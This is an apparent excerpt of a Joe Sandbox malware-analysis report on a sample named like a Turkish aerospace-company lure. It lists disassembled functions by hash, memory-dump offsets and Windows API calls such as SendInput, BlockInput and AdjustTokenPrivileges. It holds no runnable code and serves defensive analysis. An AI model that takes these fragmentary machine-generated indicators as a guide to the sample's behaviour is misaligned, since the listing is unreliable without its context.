                                                                                                                                    • Opcode ID: 86a5109ef734e303400224d37550501931dbb4d7b46079ac629b5630bdf95258
                                                                                                                                    • Instruction ID: e7fb36ac63a9cc81a8400543893a37b84f1757c6bb4f73b84bcf099c3da1dda8
                                                                                                                                    • Opcode Fuzzy Hash: 86a5109ef734e303400224d37550501931dbb4d7b46079ac629b5630bdf95258
                                                                                                                                    • Instruction Fuzzy Hash: 544138765002196BCB209FB9DC88EFB77B8EB84314F5082A9F905C7180E7709D818B90
                                                                                                                                    APIs
                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 001DD28C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: NameUser
                                                                                                                                    • String ID: X64
                                                                                                                                    • API String ID: 2645101109-893830106
                                                                                                                                    • Opcode ID: 062ae0f87eb7894573e02fd47167b89fe46f3bf88737f966f782964bbaf06121
                                                                                                                                    • Instruction ID: 71f49603fe4815ace901e9e753a1e53d8e2d86385df3dd057c288715f87eac2e
                                                                                                                                    • Opcode Fuzzy Hash: 062ae0f87eb7894573e02fd47167b89fe46f3bf88737f966f782964bbaf06121
                                                                                                                                    • Instruction Fuzzy Hash: 1BD0C9B480111DEACF98CB90EC88DDAB37CBB14345F114152F146A2100DB3095488F10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                                    • Instruction ID: 0030966581f8dc7f1fa3f181a7f9f927b413d55fa5b53604e54983191fd92ae3
                                                                                                                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                                    • Instruction Fuzzy Hash: 94021C75E002199FDF14CFA9C8806ADFBF1EF59324F25816AD819E7384D731AA418BD4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Variable is not of type 'Object'.$p#%
                                                                                                                                    • API String ID: 0-450323306
                                                                                                                                    • Opcode ID: f6065fd80c6ce42ec9d998f988a281a2455549b8635e565190eefa155c278856
                                                                                                                                    • Instruction ID: cad0318311ff89eb44563abd519b3e111d64d106518e6fa24fb6dfdb478edf9f
                                                                                                                                    • Opcode Fuzzy Hash: f6065fd80c6ce42ec9d998f988a281a2455549b8635e565190eefa155c278856
                                                                                                                                    • Instruction Fuzzy Hash: 02329B70900218DFDF19EF94D881BEDB7B5BF19304F24805AE906AB292D775AE45CFA0
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001F6918
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001F6961
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: 0ada6ae98ac6269af566fa9bc1174091678b8dafbc9d618a6e932eddd5c208d8
                                                                                                                                    • Instruction ID: 53fafce5139dfa2928a898c32312c75ff50d16fe194e9befd2e1ae1960ae973d
                                                                                                                                    • Opcode Fuzzy Hash: 0ada6ae98ac6269af566fa9bc1174091678b8dafbc9d618a6e932eddd5c208d8
                                                                                                                                    • Instruction Fuzzy Hash: B811D0356042009FD710DF29D488A26BBE0FF84328F14C699E9698F2A2CB70EC05CB90
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00204891,?,?,00000035,?), ref: 001F37E4
                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00204891,?,?,00000035,?), ref: 001F37F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                    • Opcode ID: 67036c74d1e58efe3bd5732d6a7cbc401b28902300116d1ecaa2166655a97ff5
                                                                                                                                    • Instruction ID: 5eef793919db23e587a2ce39f8294c6d2154cb7ac5d99c163cda3e6c6731c26a
                                                                                                                                    • Opcode Fuzzy Hash: 67036c74d1e58efe3bd5732d6a7cbc401b28902300116d1ecaa2166655a97ff5
                                                                                                                                    • Instruction Fuzzy Hash: D7F0E5B46042282AE72027669C4DFEB3AAEEFC5761F000275F619D2281DBA09944C7B0
                                                                                                                                    APIs
                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 001EB25D
                                                                                                                                    • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 001EB270
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                    • Opcode ID: 58d61fa07b1bc6db8b2d83ae6fcce1df39ca792afb787d91e0250ad8c846e6ad
                                                                                                                                    • Instruction ID: 09dc93b96ca6faf5cd885aff059ff0c2b3658c7a2fc12771bd0fa0b2ff5c5fe6
                                                                                                                                    • Opcode Fuzzy Hash: 58d61fa07b1bc6db8b2d83ae6fcce1df39ca792afb787d91e0250ad8c846e6ad
                                                                                                                                    • Instruction Fuzzy Hash: C5F01D7584428EABDB059FA1D805BEE7BB4FF04305F108009F955A5191C7799611DF94
                                                                                                                                    APIs
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001E11FC), ref: 001E10D4
                                                                                                                                    • CloseHandle.KERNEL32(?,?,001E11FC), ref: 001E10E9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                    • Opcode ID: 38b4ffadf544fd292ca47f2c949e0833bce8ddb43bef7900cf42d5d65832e8c1
                                                                                                                                    • Instruction ID: 202b5073e7aaea2fef6a4e17491ab03c68cf79e886f80ea7fd7aad95f4e5d6b3
                                                                                                                                    • Opcode Fuzzy Hash: 38b4ffadf544fd292ca47f2c949e0833bce8ddb43bef7900cf42d5d65832e8c1
                                                                                                                                    • Instruction Fuzzy Hash: 9FE0BF76058610BFEB252B51FC09EB777E9EB14310B24C82DF5A5804B1DB626C91DB50
                                                                                                                                    APIs
                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001B6766,?,?,00000008,?,?,001BFEFE,00000000), ref: 001B6998
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                    • Opcode ID: a2d877519da0c6ad57284ff662c52c7f56927c83460b57af5dd46246a8e22a91
                                                                                                                                    • Instruction ID: 29a13a4c2cc1e14390cf0d1f0cd8b8080d484fea77cdd4fc4bad312b67a9bb28
                                                                                                                                    • Opcode Fuzzy Hash: a2d877519da0c6ad57284ff662c52c7f56927c83460b57af5dd46246a8e22a91
                                                                                                                                    • Instruction Fuzzy Hash: 52B14D31510608DFDB19CF28C486BA57BE0FF55364F298658E899CF2A2C739E991CB40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: 9b9424c4dd54e37f34b11addd8dcc8dd5da8b5ef3beb26e0fba80351e9f14b69
                                                                                                                                    • Instruction ID: 64fa5b7e7d70d4297d13ffc6baa0cb7d1d2bcc6e946fa23d7b2b211ea82d1ac5
                                                                                                                                    • Opcode Fuzzy Hash: 9b9424c4dd54e37f34b11addd8dcc8dd5da8b5ef3beb26e0fba80351e9f14b69
                                                                                                                                    • Instruction Fuzzy Hash: 36127D71E042299BCF24CF58D9816EEB7F5FF48710F1581AAE849EB251DB309A81DF90
                                                                                                                                    APIs
                                                                                                                                    • BlockInput.USER32(00000001), ref: 001FEABD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BlockInput
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                    • Opcode ID: 973dd9e1507785859a8f00f24669646e839c813c3311ecbe7da683ea8ded7491
                                                                                                                                    • Instruction ID: 10d61b34d374422096a06fc3fd9b0bd401c0f35ba21563d5463d5d7fb5e5fb48
                                                                                                                                    • Opcode Fuzzy Hash: 973dd9e1507785859a8f00f24669646e839c813c3311ecbe7da683ea8ded7491
                                                                                                                                    • Instruction Fuzzy Hash: CFE04F752002049FD710EF59E844E9AFBEDBFA8760F148416FD49C7361DB70E9408BA0
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001A03EE), ref: 001A09DA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: 5b0a16c565d55e5864166b456ccbf34a521d275694f9cfb0012d991cde7078ff
                                                                                                                                    • Instruction ID: e502ee0e992cf055e097e08056b408c04ef53269bf6ea44a02a944ecec562f1f
                                                                                                                                    • Opcode Fuzzy Hash: 5b0a16c565d55e5864166b456ccbf34a521d275694f9cfb0012d991cde7078ff
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                                    • Instruction ID: 1358f862a56fcbacdb3a7d3e7b5012b6a9d77cc7f9cb00b9241d1a9c0f773f15
                                                                                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                                    • Instruction Fuzzy Hash: 4A51657E60C7056BDB3885288C5EBBF63899B13354F18051AE886D72C3CB19DF05D356
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0&%
                                                                                                                                    • API String ID: 0-1408265185
                                                                                                                                    • Opcode ID: 5850d15422356935ec434eb6ba042e3fb65c7d1b07c101bffc9edde7aca31018
                                                                                                                                    • Instruction ID: bb27767387af403621f5ce4e385f27a8513b16204294ae98ce807be1f25cba13
                                                                                                                                    • Opcode Fuzzy Hash: 5850d15422356935ec434eb6ba042e3fb65c7d1b07c101bffc9edde7aca31018
                                                                                                                                    • Instruction Fuzzy Hash: E921B7326206158BDB28CF79D82367E73E9A764310F15862EF4A7C37D0DE39A904CB84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b2d591bd5ba2b3ba79d9ceb1f00b005b85151f9054e63d7024487c3aaf2f068d
                                                                                                                                    • Instruction ID: 43865a847a92aebfe5b47eb059a5aa03539734b0b14dc528c840596c38cafa32
                                                                                                                                    • Opcode Fuzzy Hash: b2d591bd5ba2b3ba79d9ceb1f00b005b85151f9054e63d7024487c3aaf2f068d
                                                                                                                                    • Instruction Fuzzy Hash: 4F322222D29F019DD7339634DC26335A689AFF73C5F15E737E81AB5AA9EB29C4834100
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8b9915a8cc1305e7e92670afa25f5755fbff41a07bd0723ad4c0e7fce941423b
                                                                                                                                    • Instruction ID: 06bdd91ef785ff83b28a125afb0478a4d0094ed9c0665b25867f805ce99c26dd
                                                                                                                                    • Opcode Fuzzy Hash: 8b9915a8cc1305e7e92670afa25f5755fbff41a07bd0723ad4c0e7fce941423b
                                                                                                                                    • Instruction Fuzzy Hash: CD320332A401178BDF28CB68C4946BD7BA2EB45314F298D6BD48ACB391E730DD81DBC0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 12c539f8c1bf5eabbea20b2d63553a2eeec62cabdcf941d53bb9dff03b0630a0
                                                                                                                                    • Instruction ID: 100e5c2283a491264c5ddc23a7adc8b5062f181b777e2b7782661d901f422047
                                                                                                                                    • Opcode Fuzzy Hash: 12c539f8c1bf5eabbea20b2d63553a2eeec62cabdcf941d53bb9dff03b0630a0
                                                                                                                                    • Instruction Fuzzy Hash: B1228070A04609DFDF18DFA4D881BAEB7F6FF54300F244529E816A7291EB35EA51CB50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b0acabf8008adc580424e1767e94632d2b041dbf4ad130831bd077d0382d77fa
